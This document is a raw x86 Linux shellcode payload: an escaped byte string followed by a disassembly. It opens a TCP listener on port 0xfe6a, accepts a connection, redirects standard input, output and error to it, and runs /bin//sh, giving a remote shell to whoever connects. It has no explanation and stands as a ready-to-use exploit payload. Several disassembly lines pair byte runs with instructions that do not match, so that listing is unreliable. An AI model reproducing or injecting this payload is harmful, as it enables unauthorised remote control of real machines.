                   5                  10                       16
"\x6a\x66\x5e\x83\xec\x20\x31\xdb\x43\x89\x5c\x24\x04\xc6\x04\x24" 1
"\x02\xc6\x44\x24\x08\x06\x89\xe1\x89\xf0\xcd\x80\x89\x04\x24\x43" 2
"\x89\x5c\x24\x0c\x66\xc7\x44\x24\x0e\xfe\x6a\xc6\x44\x24\x08\x14" 3
"\x99\x89\x54\x24\x10\x8d\x44\x24\x0c\x89\x44\x24\x04\x89\xf0\xcd" 4
"\x80\x89\x54\x24\x04\x43\x43\x89\xf0\xcd\x80\x89\x54\x24\x08\x43" 5
"\x89\xf0\xcd\x80\x89\xd1\x6a\x3f\x5e\x89\xc3\x89\xf0\xcd\x80\x41" 6
"\x89\xf0\xcd\x80\x41\x89\xf0\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68" 7
"\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x6a\x0b\x58\xcd\x80"

/* 127 bytes */

 8048074:	6a 66 5e               	push   $0x66
 8048077:	83 ec 20             	sub    $0x20,%esp
 804807a:	31 db 43               	xor    %ebx,%ebx
 804807d:	89 5c 24 04          	mov    %ebx,0x4(%esp,1)
 8048081:	c6 04 24 02          	movb   $0x2,(%esp,1)
 8048085:	c6 44 24 08 06       	movb   $0x6,0x8(%esp,1)
 804808a:	89 e1 89 f0              	mov    %esp,%ecx
 804808e:	cd 80                	int    $0x80

 8048090:	89 04 24 43            	mov    %eax,(%esp,1)
 8048094:	89 5c 24 0c          	mov    %ebx,0xc(%esp,1)
 8048098:	66 c7 44 24 0e fe 6a 	movw   $0x6afe,0xe(%esp,1)
 804809f:	c6 44 24 08 14 99      	movb   $0x14,0x8(%esp,1)
 80480a5:	89 54 24 10          	mov    %edx,0x10(%esp,1)
 80480a9:	8d 44 24 0c          	lea    0xc(%esp,1),%eax
 80480ad:	89 44 24 04          	mov    %eax,0x4(%esp,1)
 80480b1:	89 f0 cd 80              	mov    %esi,%eax

 80480b5:	89 54 24 04 43 43         	mov    %edx,0x4(%esp,1)
 80480bb:	89 f0 cd 80               	mov    %esi,%eax

 80480bf:	89 54 24 08 43         	mov    %edx,0x8(%esp,1)
 80480c4:	89 f0 cd 80               	mov    %esi,%eax

 80480c8:	89 d1                	mov    %edx,%ecx
 80480ca:	6a 3f 5e 89 c3              	push   $0x3f
 80480cf:	89 f0 cd 80 41               	mov    %esi,%eax

 80480d4:	89 f0                	mov    %esi,%eax
 80480d6:	cd 80 41               	int    $0x80
 80480d9:	89 f0 cd 80              	mov    %esi,%eax

 80480dd:	52                   	push   %edx
 80480de:	68 6e 2f 73 68       	push   $0x68732f6e
 80480e3:	68 2f 2f 62 69       	push   $0x69622f2f
 80480e8:	89 e3                	mov    %esp,%ebx
 80480ea:	52                   	push   %edx
 80480eb:	53                   	push   %ebx
 80480ec:	89 e1                	mov    %esp,%ecx
 80480ee:	6a 0b                	push   $0xb
 80480f0:	58                   	pop    %eax
 80480f1:	cd 80                	int    $0x80
